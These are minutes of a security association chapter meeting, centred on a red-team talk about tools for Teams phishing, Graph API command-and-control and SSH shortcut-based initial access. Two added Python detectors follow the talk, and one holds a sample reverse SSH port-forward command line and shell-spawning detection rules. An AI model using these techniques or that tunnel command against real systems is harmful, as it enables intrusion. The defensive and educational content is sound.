ISSA Chapter Meeting 7 May 2024:
Opening remarks: Hybrid meeting: Meeting held in-person at ECPI and virtually on Zoom. For questions, please raise your virtual hand or use the chat feature. Charles is attending virtually today. Please give us feedback after the meeting: what did you like? What could we improve?
Agenda: Welcome/Membership/Education/Presentation/Business Meeting/Q&A/ Feedback/Adjourn
Organization Chart:
As usual we are looking for volunteers!
ISSA-HR Professional Association Benefits: Build professional relationships; stay current on developments in areas of information security/risk/privacy; professional development and education opportunities (looking forward to our presentation today!); earn CPE/CEU continuing education credits; learn practical and best-practice solutions; career information and employment opportunities.
Whether you’re a pre-professional, entry-level, mid-career, senior practitioner or security leader, ISSA offers strategic resources and guidance to successive career levels.
Membership Annual Cost: Professional (not a student) $95, Student $30; Chapter Dues $30. Professional = $125 total, Student = $60.
*Select Hampton Roads as your chapter
New Members: Welcome: Steven M!
Patrick is here! He is a new member (March), welcome! Thank you for joining.
Education: Resources on website, we do now have a separate mentorship program; we are passionate about what resources are out there!
Goals: Provide educational resources, mentorship opportunities, teambuilding/collaboration, hands-on industry tool familiarization, certification tracking/pipeline
America’s Cyber Defense Agency: National coordinator for critical infrastructure and resilience
National organization under DHS, Lots of training resources on their website! (screenshot of slide)
Free Courses:
https://www.cisa.gov/resources-tools/training
Resources and Tools: CISA offers an array of free resources and tools, such as technical assistance, exercises, cybersecurity assessments, free training and more!
Also other resources such as toolkits: regional cybersecurity advisors, cyber hygiene, Cybersecurity Performance Goals; check it out! We as ISSA can also request them to speak.
Social Media Resources:
Zeffy is now used for event registrations; we sent an email out to those who were signed up through Eventbrite. With Eventbrite we were limited to a certain number of sign-ups, and they have begun to charge for the service. Eventbrite is still being used, though it has a 25-attendee limit.
Feel free to pitch in and share ideas on our discord!
Discord (QR below): use the QR code, the link, or search “ISSA-HR” (https://discord.com/invite/Jt3m7TWQzQ)
LinkedIn: great resource to get in touch with us:
Click the QR code (above), the link, or search for “Information Systems Security Association – Hampton Roads Chapter”: https://www.linkedin.com/company/information-systems-security-association-issa-hampton-roads-chapter/
Website: Be sure to also check out the Meeting recap on the ISSA-HR webpage!
We’ve been blogging on LinkedIn! Thanks Faith! We love feedback!
https://issa-hr.org/issa-hr-chapter-meeting-9-april-2024/
Meetings and Social Events:
7 May: Alex Reid, former Navy Red Team (NRT) Tool Developer: An overview of some recent tool developments
4 June: Evan Larson, Millennium Project Manager: Review of recent Facebook/Meta hack: timeline and recommendations.
July, August, September, November: TBD
If you’ve been to or go to conferences and find a potential speaker, or if you want to speak yourself, let us know! Practice something you’ve been working on or dig into something, such as a class presentation, an experience you’ve encountered, or anything else related to cyber!
Looking for speakers for 2024 and an in-house back-up speaker: please reach out to the ISSA Meeting Program Director, Evan Larsen (see email list at bottom).
Cyber Social: Wednesday May 22nd, 5:30-8:30. It’s a great casual event with always a good turnout. No expectations, great place to network, definitely a good time. Be advised we will not get the side room this time, but we will be there; come out for a beer, and we might (weather permitting) be able to be outside. You can sign up for emails to stay in the know about these events!
After-Meeting Networking Happy Hour: after the ISSA meeting at Plaza Degollado (around the corner from ECPI).
Jobs: (Have a job/Need a job Next slide):
Need a job: Type of Job, Elevator Pitch (Value you bring, qualifications, additional info)
Have a Job: Title of Job, basic requirements, contact information
ISSA has a job search page http://iz1.me/XJU31zUSeBV
https://issa-jobs.careerwebsite.com/jobseeker/search/results/
Government Jobs: USAJOBS.gov:
Government job resource: a great resource for federal resumes is the Federal Resume Guidebook by Kathryn Troutman.
The best way to get a job is through networking, as always.
Need a Job: If you’re looking for work, now’s your chance to let us know! Let us hear your elevator pitch: an introduction; a summary of what you do (current role and why you are doing well there); relevant experience; your value and what problem you can solve; and a call to action for what you’d want to do next. Whether you are currently employed or just want to practice, now is a great opportunity.
Optionally, for an extra 30 seconds you can add other details such as clearance status, remote, on-site or relocation preference, additional education/certs not already mentioned, and other short details. We can post your email in the chat if you want, we will ensure it gets to the right people.
Have a Job:
Job title/Company/Type (Contractor, Government, Private sector, Internship, Full time, Part time)/Requirements (Years’ work experience, Education, Certs, Clearance)/Desired experience, qualifications and any other information desired (keep it short)
Monthly Presentation: Red Team Tooling
Speaker: Alex Reid: Adept cybersecurity professional transitioning from Navy Red Team to another red team within the DoD. Strong passion for offensive security, skilled penetration tester and internal compromise assessor as well as purple teamer.
He is proficient in exploring Active Directory and holds OSCP and OSEP certifications.
He has also contributed two tools to the Cobalt Strike Community kit!
Alex has a keen interest in AV evasion and exploitation techniques to circumvent the defenses of mature organizations. Extensive experience in C and C# programming, sandbox evasion, shellcode encryption and innovative API resolution methods. Additionally, he has considerable experience in Python3 for automating enumeration and payload generation.
Alex is actively enhancing Cobalt Strike’s functionality with Aggressor scripts and Beacon Object Files, aiming to deviate from detectable default behaviors.
Welcome Alex!
Alex is separating from the Navy (2 weeks left!). Jon Bos and Alex met at another Hampton Roads organization, the Navy red team; they know a lot of the same folks.
He worked on NRT; the Navy has several red teams, but he works for THE Navy Red Team.
He would like to take this time to talk about his experience.
WHOAMI:
Started as an operator (CWT), advanced to tech lead and went from there; it was not so much a pipeline as a journey.
OSEP certified. OSCP is the benchmark offensive security cert; OSEP is 300 level (OSCP is 200 level) and explores the topic of the red team toolbelt.
Prior to the Navy he had never opened a command prompt. 6 months in (A school) and then to the red team, which was a roll of the dice. There is no formal selection process, you get what you get; Alex acknowledges he got lucky. “There’s cybersecurity, offensive security is all about skillsets, it helps to have backgrounds, software engineering, support, admin..” (Alex did not get that)
“Lost a lot of hours, and late nights to gain the knowledge he needed to succeed in his rate.”
He walked a sort of gray line during his time in the Navy (there was NO policy, so it’s possible he got away with a lot). He operated under mental best practices, asking questions such as ‘What is too dangerous to release? What could be used against the Navy?’
What’s In Red Team Operation?:
“Broad overview, focus on stealth and adversary emulation in pentesting. Comprehensive review of the network, listing and categorizing (vulnerabilities) by severity. Red teaming is less about finding every hole and more about using the ones you find to your advantage. Beyond domain admin privileges, more of what you do after that. Or even if you have to do anything after that.
“During workups, things are tested, including penetration tests. Such as degrading network, phishing simulations from APTs, trying to make sure those who may be involved are truly ready. From the government side, communicating to senior officers WHY they should care, and how it translates to “warheads on foreheads” is a great challenge.
Red team ops have multiple phases: recon, initial access and post-exploitation, persistence, lateral movement, credential harvesting, etc.
Malware used to implant, harvesting O365 creds, “trusted” emails.
Each of these phases has multiple subphases.
Tools make the world go ‘round!
There are a hundred ways to set persistence or move laterally; most affect the network at a low level. If you have tools, you can achieve these tasks reliably and quickly.
Each stage has different tools, from Nmap for enumeration all the way to post-exploitation tools that build and implant an access-control bypass or dump credentials from LSASS or the SAM, all in service of the main goal.
Red Team Landscape:
“Things have gotten progressively harder in the Red Team world since I noticed it two years ago (that’s a good thing!): greater adoption of two-factor authentication (2FA) and endpoint detection and response (EDR, “new age antivirus”). There are a million different types of them, SentinelOne, Carbon Black, Microsoft; each one works differently. Think of it as a giant cat-and-mouse game. It’s these advancements that make it harder for an adversary to do things; this is what makes Red Teaming harder.
“The shelf life of public tools has shrunk, by the time it gets from GitHub to EDR or patched by the vendor. A post-exploitation tool that works on Windows that Microsoft “can’t” fix: no bug or fix, but a feature. They cannot patch that, but EDR vendors can write signatures to help people know more about it and respond accordingly.
Q: Jon: as this time frame shrinks, what is the new incentive for folks to release on GitHub?
A: Alex: Jobs. In combination of getting certs. It helped that I was interested in the work. From an economic perspective it makes sense to do it. When it’s exposed, the clock starts on that shelf life. Not to say that once it’s out there– it depends how impactful the tool is, the more popular, the faster they are likely to get patched. The latter are still viable years later.
Many have found they are discouraged from posting tools on GitHub, or even blog posts, for these reasons.
Q: Kenn: lot of money in the grey market?
A: Alex: and potential legal consequences.
Kenn: Would people pay $50/$100 for access to these tools?
Alex: Different countries may classify these tools as export controls or cyber weapons that may “muddy” the waters.
Kenn: say a government likes your tool, what’s stopping them from turning around and selling it to the enemy?
(Above) The chart shows median dwell time. Going back to 2011, the median dwell time was 416 days (that much time the threat actor was on the network).
Fast forward to 2015, and the data splits into external/internal: Microsoft may have seen tenant logs (external), or the SOC/BT detects the behavior themselves (internal). In 2023 the difference is STARK; even in the last 4 years, the median has gone down from 24 days to 10.
“Offensive security is getting harder. Each day the low hanging fruit is plucked, people have to get more creative, people are getting more security aware, tying cyber into executive goals.
The nature of these attacks has changed over the years, which affects these numbers; ransomware attacks are an example. Once they have what they need, they’ll let themselves be known, but they may be sneaky until then to get as much information as they can.
Red Team Tool Design Theory:
“Tools should be user friendly. A lot of tools have setup steps, dependencies, python packages, compiling, build processes, and then there’s actually running the tool.
A lot of tools have a lot of parameters, depending on what you want them to do, including “guardrails”. Despite developers’ intent, people find ways to use programs as they are not intended. Safeguards must be considered, such as input validation, regex, etc.
“Blend in with legitimate program behavior/system calls/network traffic, as much as possible.
Red teams try to be sneaky to get past EDRs, and EDR creators respond promptly, establishing patterns and labeling them as malware. Red team tools have adapted in response with techniques such as Living off the Land, using native programs to their advantage.
Patrick: D/invoke has developed to detect odd API calls.
Alex: D/Invoke helps identify APIs that assist in malware behavior (API hooking). In memory, DLLs contain APIs and functions; each of these exported functions is used by programs. EDRs load their own DLLs into whatever process and overwrite (in memory) the instructions presently in that function’s DLL. When you call that API, the call gets sent to the EDR’s DLL, and the EDR determines whether it’s legitimate. The EDR patches if something devious is detected, and the program can continue to work as normal (Hell’s Gate, Halo’s Gate: directing syscalls to get around EDRs and their telemetry).
“Microsoft is integrated at the kernel level. Red teamers try to spoof parent processes. It’s possible through API call manipulation that can change or obscure parent processes to be something unassuming. Malicious .exe’s can look like legitimate processes. Parent process spoofing can be detected by modern EDRs. Determining normal behavior, finding patterns, are what red teamers look for, so the logs can stick out less. Avoiding static indicators (drop file to click), a normal operation; the name of the file can be arbitrary. The idea is between runs of those tools, to change not the code, but build functionality to maybe make a random file name to help deter from pattern detection.
“If targeting a Windows environment, would use Python since it’s native; tools should be written in a language appropriate for where they are meant to run, interoperable with other tools when possible, and should ensure FUNCTIONALITY! Though many lessons are learned when something breaks.
“Lastly, have accurate documentation for not only those using the tool, but yourself.
You will save HOURS. Viewing old code through older eyes can show a lot of past (purposeful) seemingly bad code, which has a purpose! But you forgot. And now the code won’t run.
Tool Showcase:
TeamsPhisher: a Python tool that automates sending phishing messages and file attachments to Microsoft Teams users. Teams cannot send content outside of its tenant organization, but this is a client-side feature; if you invoke the server side directly, you can bypass those controls.
Alex did NO original research; he used public research and pieced it together for this tool. JUMPSEC had published some pertinent documentation used in the development of this tool. The victim does not get an “outside organization” warning, and the sender can send arbitrary files or malicious executables.
TeamsPhisher usage: option switches, targets (email addresses in the Microsoft ecosystem), the phishing message, attachment.
Normal splash screen:
(see photos)
Pretexting and social engineering can be used with this technique.
TeamsPhisher has a splash screen bypass; you still get the outside organization banner, but ‘people don’t read’:
They get the message, the text file, and whatever else you sent them.
TeamsPhisher timeline:
“An article was published by BleepingComputer that sourced from Alex’s GitHub, which just says “Navy Red Team member”; he was asked if he was a member of every branch (except the Coast Guard).
TeamsPhisher was a side project, not done on Navy time. The Navy is NOT vulnerable to this program; it was checked.
TeamsPhisher, Lessons Learned:
“Impact > geek factor. Nothing fancy; a side project not to be used operationally, and it is now by far the most visible tool that put Alex on the map, despite his more complex and (to him) cooler tools. The best product may not win. Microsoft’s initial nonchalant response is concerning. (Maybe there were bigger fish to fry?)
On open source tooling: if it does manage it may not sound ethical.
How do we mitigate?: Release the research as opposed to the fully functional tool code. Or, if you are going to post code samples, build IOCs into the tool. If the code base is out there, threat actors will find it, but to a script kiddie it may be more obscure: someone ripping off/using stock code from the internet might not parse the code themselves and will leave “tracks”.
Tool Showcase: GraphStrike:
“A toolkit so Cobalt Strike (CS) Beacons communicate via the Microsoft Graph API instead of normal C2 traffic methods. Traffic can be made to look similar to legitimate sources.
Diagram (see slide): normal operation: buy a domain, set up a redirector; the beacon sends HTTPS GET requests to look like normal website traffic, but the requests contain commands from the team server. From the target’s perspective, this process looks legitimate.
GraphStrike obscures the traffic so the headers and URIs look legitimate.
All beacon traffic is sent to Microsoft servers using a legitimate service (Graph API), including jitter.
GraphStrike: why?:
“Microsoft’s Graph API is seen being used in malware developed by APTs, in various malware families. This is a real-world threat. This tool provides a way for red teams to simulate that very real threat.
NO advance direct coordination with Microsoft; we are not trying to hide from Microsoft, we are trying to hide from our victim. Better to ask forgiveness than permission. That’s the middle ground where Alex currently stands.
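The flip side of the GraphStrike discussion is detection: Beacon traffic to graph.microsoft.com still has to come from some process, and even with jitter its check-in interval is far more regular than a human-driven client. The following added example (not from the talk or the GraphStrike project) runs a simple regularity check over constructed proxy log lines; the log format, the host and process names, and the set of "expected" Graph clients are all assumptions for the example.

```python
"""Flag periodic Graph API traffic from unexpected processes (constructed example)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed log format: "<ISO time> <host> <process> <method> <url>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")

# Assumption for the example: processes that legitimately talk to Graph on this estate.
EXPECTED_GRAPH_CLIENTS = {"outlook.exe", "teams.exe", "onedrive.exe"}

# Constructed sample: ws01 is a normal mail client; ws02 checks in roughly every minute.
SAMPLE_LOGS = """\
2024-05-07T10:00:00 ws01 outlook.exe GET https://graph.microsoft.com/v1.0/me/messages
2024-05-07T10:00:03 ws01 outlook.exe GET https://graph.microsoft.com/v1.0/me/calendar
2024-05-07T10:04:10 ws01 outlook.exe GET https://graph.microsoft.com/v1.0/me/messages
2024-05-07T10:00:00 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
2024-05-07T10:01:02 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
2024-05-07T10:01:58 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
2024-05-07T10:03:05 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
2024-05-07T10:03:57 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
2024-05-07T10:05:01 ws02 svchost.exe GET https://graph.microsoft.com/v1.0/drive/root/children
"""


def parse_logs(lines):
    """Yield (timestamp, host, process, url) for each well-formed line."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        ts, host, proc, _method, url = m.groups()
        yield datetime.fromisoformat(ts), host, proc.lower(), url


def find_beacons(lines, min_requests=5, max_cv=0.25):
    """Return {(host, process): stats} for Graph traffic whose timing looks like a beacon.

    Regularity is measured as the coefficient of variation (stdev / mean) of the
    gaps between requests; jittered check-ins still sit well under max_cv, while
    human-driven clients produce bursty, irregular gaps.
    """
    per_key = defaultdict(list)
    for ts, host, proc, url in parse_logs(lines):
        if urlparse(url).hostname != "graph.microsoft.com":
            continue
        per_key[(host, proc)].append(ts)

    findings = {}
    for (host, proc), stamps in per_key.items():
        if proc in EXPECTED_GRAPH_CLIENTS or len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            findings[(host, proc)] = {"count": len(stamps), "mean_interval": mean, "cv": cv}
    return findings


if __name__ == "__main__":
    for (host, proc), stats in find_beacons(SAMPLE_LOGS.splitlines()).items():
        print(f"{host} {proc}: {stats['count']} requests, "
              f"~{stats['mean_interval']:.0f}s apart (cv={stats['cv']:.2f})")
```

On real proxy or EDR telemetry the thresholds and the expected-client list need tuning per environment; the point is that the destination being Microsoft does not by itself make the traffic benign.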
Tool Showcase: SSHishing:
“Most recent work; the name plays off what you see on LinkedIn and Twitter: “vishing, smishing,” etc. Developed a phishing toolkit that creates a port forward using SSH between Alex and his victim.
“Windows 10 by default ships with the SSH client installed; the SSH server has to be enabled, but the client is there. LOLBAS (living off the land, https://lolbas-project.github.io/): people have aggregated Microsoft-signed, Windows-default applications that can be used offensively. LOLBAS displays binaries native to Windows that could be used offensively.
Options and switches native to SSH help create a more convincing phishing experience. Once the payload is run (i.e. a shortcut), it can call SSH with specified switches: it downloads, executes, calls SSH locally, and also opens a real file to further obscure anything ‘phishy’.
It can run commands like ipconfig to aid situational awareness, or try to use an SSH key hosted on the attacker’s server to capture network credentials.
ALL within SSH.
SSHishing illustrated:
“Reverse shells are useful since outbound firewalls are generally much more permissive than inbound ones.
Port 22 going out of the network looks less ‘phishy’ than port 445 (EternalBlue).
Proxychains allows access to ports on private networks via SSH, while response traffic goes back through the tunnel to the attacker’s machine. As a result, ssh.exe is able to spawn and run cmd.exe commands even when cmd.exe is disabled by Group Policy.
SSHishing DEMO: (this slide shows a real-time SSHishing demonstration), which is elaborated on further in this Red Siege blog post written by Alex: https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/
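From the defender's side, the SSHishing chain described above leaves a distinctive process lineage: the built-in ssh.exe launched from a shortcut double-click (parent explorer.exe), ssh.exe asked for a port forward, and a shell running underneath ssh.exe. The following added example (not from the talk or the SSHishing toolkit) applies those three checks to constructed process-creation events; the event fields, PIDs, paths and command lines are assumptions made up for the example.

```python
"""Process-lineage checks for SSH-client abuse (constructed example)."""

# Constructed events in a Sysmon-like shape: pid, ppid, image path, command line.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # ssh.exe started from explorer (a shortcut was clicked) requesting a remote forward
    {"pid": 1200, "ppid": 400, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -R 2222:127.0.0.1:22 user@203.0.113.10"},
    # shell spawned underneath that ssh.exe
    {"pid": 1250, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig"},
    # benign admin use: ssh from an interactive PowerShell, no forwarding options
    {"pid": 900, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 950, "ppid": 900, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe admin@jumphost.internal"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# OpenSSH options that request local, remote or dynamic port forwarding (case-sensitive;
# lowercase -l is the login-name option and must not match).
FORWARD_FLAGS = {"-L", "-R", "-D"}


def basename(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Yield parent events walking up the tree, stopping at unknown PIDs or loops."""
    seen = {pid}
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev


def requests_forwarding(cmdline):
    """True if any argument is a port-forwarding option, attached (-R2222:...) or not."""
    return any(arg[:2] in FORWARD_FLAGS for arg in cmdline.split()[1:])


def analyze(events):
    """Return a list of (pid, rule_name) findings over the given events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name == "ssh.exe":
            parent = by_pid.get(e["ppid"])
            if parent and basename(parent["image"]) == "explorer.exe":
                findings.append((e["pid"], "ssh_from_explorer"))
            if requests_forwarding(e["cmdline"]):
                findings.append((e["pid"], "ssh_port_forward"))
        elif name in SHELLS:
            if any(basename(a["image"]) == "ssh.exe" for a in ancestors(e["pid"], by_pid)):
                findings.append((e["pid"], "shell_under_ssh"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule alone produces noise on hosts where administrators use ssh.exe; the value is in the combination, and in baselining which hosts have any business running the client at all.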
Kenn: webproxy helps ask for creds for SSH outbound
Q&A:
Q: You can use tools all you want in HTB, what about real world?
A: if you’re looking to get into malware, malware academy is great, came out about a year ago, (Speaker) has not bought it yet $500 for lifetime access, full useable code samples, malware evasion type stuff, actively maintained and updated. I have learned great lessons from dropping Mimikatz to squat. Lol
There are some courses out there more RT methodology/mindset, (CRTO/CRTO2, get CobaltStrike in the course, teach you trade craft/methodology for CS. There is not really a crash course to red teaming. Tool devs and operators aren’t the same but they work together.
(Contact)
Thank you Alex!
Business Meeting:
Old business/New business/Membership Updates/Secretary: Meeting Minutes/Treasury Report/Social Media Updates
Old Business: Social Event, Casual Pint April 24th, Mentorship program, Mentorship Chair: Desmond Graham
New Business:
Conferences
Volunteer Events: What would members like to participate in? Who can volunteer to lead?
ISSA Mentorship program:
Desmond Graham: Mentorship Chair
Call for volunteers on the mentorship Program committee
Call for Mentors: reaching out to schools and companies in the area
Mentorship Mixers: Learn about how to get into cybersecurity with no previous background
Meet and learn from cybersecurity SME mentors
Network with hiring managers and the cybersecurity ecosystem
Conferences:
5th Annual Digital Forensics for National Security: May 15-16 in National Harbor, MD: $0-$1290 https://digitalforensics.dsigroup.org/
Women Tech Leaders Summit: May 15-16 in Washington DC: $20-$299
https://govciomedia.com/women-tech-leaders-summit/
Women in Tech DC: May 15-16 in Washington DC: $249-$549
https://www.women-in-tech-dc.com/buy-tickets
HammerCon 2024: May 16th in Laurel MD: $0-$50, https://www.eventbrite.com/e/hammercon-2024-3rd-annual-national-convention-of-the-mcpa-registration-787154780137
Gartner Security & Risk Management Summit: June 3rd-5th in National Harbor MD: starts at $3825-, https://www.gartner.com/en/conferences/na/security-risk-management-us
RVASEC: June 4th-6th in Richmond VA: $375-, https://rvasec.com/
TECH YEAH 3.0: June 19th-20th in Morgantown WV: $0-(DoD $199), https://www.techyeahconference.com/techyeah3
TECHSPO 2024: July 1st-2nd in Washington D.C.: $0-, https://techspowashingtondc.com/register/
BSides Roanoke 2024: July 12th in Roanoke VA: pricing unavailable at time of writing; used to be free. If you want to guarantee getting in for free, and even meet speakers the night before at the meet and greet, or get in after tickets are no longer available, volunteer! https://bsidesroa.org/
Jon B: If you watch the calendar, you have a chance of getting in!
Zero Trust Government Symposium: July 17-18 in National Harbor, MD: $0-$1290
https://zerotrust.dsigroup.org/
DC Metro Cybersecurity Summit: July 18th in McLean VA: $195-$250, https://cybersecuritysummit.com/summit/dcmetro24/
DISA J6 Cyber Awareness Forum 2024: July 25th in Alexandria VA: $Free, but DoD only. https://www.fbcinc.com/event.aspx/Q6UJ9A01YF2W
Black Hat USA 2024: August 3rd-8th in Las Vegas, NV: $1,895 (JUST FOR BRIEFINGS; price goes up from there. Training (~6 days): very good training, VERY expensive) https://www.blackhat.com/us-24/
DEF CON 32: August 8th-11th in Las Vegas, NV: $300 (limited to badge holders) https://forum.defcon.org/node/248358
FutureCon: August 22-24 in Washington DC: $50-$200
https://futureconevents.com/events/washington-dc-2024/
Mike: DON IT East: https://www.doncio.navy.mil/ContentView.aspx?id=16674
Mike: Techno Wilmington in early June (4-6) : https://www.technosecurity.us/east
Membership Update:
Number of members: 45
Last meeting: 9 members, 6 visitors in attendance
April 9th Meeting Minutes: Meeting recap on website:
https://issa-hr.org/issa-hr-chapter-meeting-9-april-2024/
Presentation Speaker: Len Gonzales: Real-World OSINT Operations
Business Meeting:
Old Business: Cyber Social @ Casual Pint, Mentorship Program
New Business: Mentorship Program outreach, POC Desmond Graham
$4,346.65 recorded.
Treasurer Report:
Balance: $4,441.71
We NEED to get to $5k
2024 Events Calendar:
Social Media:
Email Addresses:
After Meeting: Networking Happy Hour @ Plaza Dellogado
Please give us feedback!: What did you like? Recommendations for future meetings? What could make your experience better?
Send your feedback to President @ ISSA-HR. org
Minutes notes proudly human-generated By Faith Walauskas, Secretary: ISSA Hampton Roads.
Thank you for reading!